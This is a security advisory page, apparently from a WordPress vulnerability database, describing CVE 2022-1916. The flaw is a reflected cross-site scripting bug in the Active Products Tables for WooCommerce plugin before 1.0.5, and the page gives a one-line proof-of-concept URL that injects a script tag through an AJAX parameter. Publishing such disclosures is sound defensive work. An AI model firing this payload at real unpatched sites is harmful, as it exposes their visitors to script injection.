Active Products Tables for WooCommerce < 1.0.5 – Reflected Cross-Site-Scripting | CVE 2022-1916 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(%27xss%27)\u003c/script%3E%22}

Affects Plugins

profit-products-tables-for-woocommerce

Fixed in 1.0.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

d16a0c3d-4318-4ecd-9e65-fc4165af8808

Timeline

Publicly Published

2022-06-01 (about 3 years ago)

Added

2022-06-01 (about 3 years ago)

Last Updated

2023-03-03 (about 2 years ago)

Other

Published

Title

Published

2025-02-20

Title

3D Photo Gallery <= 1.3 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2024-04-22

Title

Colibri Page Builder < 1.0.272 - Contributor+ Stored Cross-Site Scripting

Published

2024-09-16

Title

Geo Mashup < 1.13.13 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-24

Title

Tutor LMS – eLearning and online course solution < 2.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'tutor_instructor_list' Shortcode

Published

2018-07-24

Title

Snazzy Maps < 1.1.5 - Multiple Cross-Site Scripting (XSS)